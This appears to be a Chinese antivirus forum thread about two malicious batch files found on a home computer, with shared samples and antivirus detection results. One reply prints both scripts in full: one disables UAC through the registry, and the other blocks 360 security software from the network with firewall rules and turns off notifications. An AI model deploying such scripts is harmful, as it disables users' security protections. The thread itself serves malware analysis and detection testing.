查看: 1429|回复: 9
收起左侧

[病毒样本] 家里电脑扫出的恶意批处理bat 2x

[复制链接]
tony099
发表于 2025-11-19 21:10:12 | 显示全部楼层 |阅读模式
米店不卖大米通过QQ闪传分享了【Desktop.zip】
链接:https://qfile.qq.com/q/1AQDOrMNqM




心醉咖啡
发表于 2025-11-19 23:03:01 | 显示全部楼层
360扫描miss
superLYT
发表于 2025-11-19 23:14:52 | 显示全部楼层
一个bat解压杀,另外一个双击后无法运行

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
biue
发表于 2025-11-20 00:27:41 | 显示全部楼层
腾讯电脑管家 2X

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
成顔
发表于 2025-11-20 00:58:17 | 显示全部楼层
卡巴解压杀1.bat ,另一个双击后cmd闪了下没啥反应

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
莒县小哥
发表于 2025-11-20 08:41:24 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
dd2006
发表于 2025-11-20 09:19:39 | 显示全部楼层
本帖最后由 dd2006 于 2025-11-20 10:32 编辑

华为 miss
红伞  miss
SEP miss

1.bat:这是禁用UAC吗?
  1. [url=home.php?mod=space&uid=331734]@echo[/url] off

  2. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

  3. echo UAC has been disabled. Please restart your computer for the changes to take effect.
复制代码



fhq.bat:
1、少了个C:\ProgramData\lnk\123.txt文件
2、启用防火墙,修改防火墙规则,阻止“Block Program Network Access”联网(出入站);
3、禁用系统通知;
4、禁止“360Safe.exe”联网?
  1. @echo off
  2. setlocal enabledelayedexpansion

  3. :: 定义文本文件路径
  4. set filePath=C:\ProgramData\lnk\123.txt

  5. :: 初始化 path 变量
  6. set pathVar=

  7. :: 逐行读取文件内容并拼接(不在最后追加空格)
  8. for /f "delims=" %%i in (%filePath%) do (
  9.     set "pathVar=!pathVar!%%i"
  10. )

  11. :: 去掉多余的首尾空格
  12. for /f "tokens=* delims= " %%i in ("!pathVar!") do set pathVar=%%i

  13. :: 显示文件内容结果
  14. echo 文件内容为:!pathVar!




  15. :: 设置要禁止联网的程序路径
  16. set program_path=!pathVar!

  17. :: 创建防火墙规则,阻止该程序的所有入站和出站连接
  18. netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="%program_path%" enable=yes
  19. netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="%program_path%" enable=yes

  20. echo 已成功创建防火墙规则,阻止程序联网。
  21. ///////////////////////////


  22. :: 设置完整路径
  23. set file_path=!pathVar!

  24. :: 去掉 "safemon\360tray.exe" 部分
  25. set modified_path=%file_path:safemon\360tray.exe=%

  26. :: 输出修改后的路径
  27. echo 修改后的路径是: %modified_path%360Safe.exe




  28. :: 设置要禁止联网的程序路径
  29. set program_path2=%modified_path%360Safe.exe

  30. :: 创建防火墙规则,阻止该程序的所有入站和出站连接
  31. netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="%program_path2%" enable=yes
  32. netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="%program_path2%" enable=yes

  33. echo 已成功创建防火墙规则,阻止程序联网。

  34. :: 开启防火墙命令
  35. netsh advfirewall set allprofiles state on

  36. :: 提示操作完成


  37. :: 禁用所有网络配置文件的入站通知
  38. netsh advfirewall set privateprofile settings inboundusernotification disable
  39. netsh advfirewall set publicprofile settings inboundusernotification disable
  40. netsh advfirewall set domainprofile settings inboundusernotification disable
复制代码




评分

参与人数 1人气 +3 收起 理由
tony099 + 3

查看全部评分

微微的笑
发表于 2025-11-20 09:42:26 | 显示全部楼层
成顔 发表于 2025-11-20 00:58
卡巴解压杀1.bat ,另一个双击后cmd闪了下没啥反应

因为缺少123.txt
jxfaiu
发表于 2025-11-20 14:34:53 | 显示全部楼层
解压秒杀1



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Curve25519
发表于 2025-11-20 16:12:26 | 显示全部楼层
ESET Smart Security Premium 解压 kill all

2025/11/20 16:11:57;文件系统实时防护;文件;\Device\TweakCubeRamDisk0\Sandbox\Admin\DefaultBox\drive\W\Desktop\1.bat;BAT/Disabler.NLA 特洛伊木马;已通过删除清除;DESKTOP-K07940I\Admin;在通过应用程序创建的新文件上发生了事件: C:\Program Files\WinRAR\WinRAR.exe (D150653D2058987677CD7ED3FF5344D9BA9D2739).;9E0C0737B0E37B3E821D011EECD9B0C7C9F2A15A;2025/9/10 15:14:28;S-1-5-21-1216372390-1976424117-2270819850-1001;
2025/11/20 16:11:57;文件系统实时防护;文件;\Device\TweakCubeRamDisk0\Sandbox\Admin\DefaultBox\drive\W\Desktop\fhq.bat;BAT/KillAV.NHS 特洛伊木马;已通过删除清除;DESKTOP-K07940I\Admin;在通过应用程序创建的新文件上发生了事件: C:\Program Files\WinRAR\WinRAR.exe (D150653D2058987677CD7ED3FF5344D9BA9D2739).;21CC730517D74FA1D13316D7E0D817F3BD710906;2025/9/10 15:14:28;S-1-5-21-1216372390-1976424117-2270819850-1001;
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-1-15 02:39 , Processed in 0.257767 second(s), 4 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表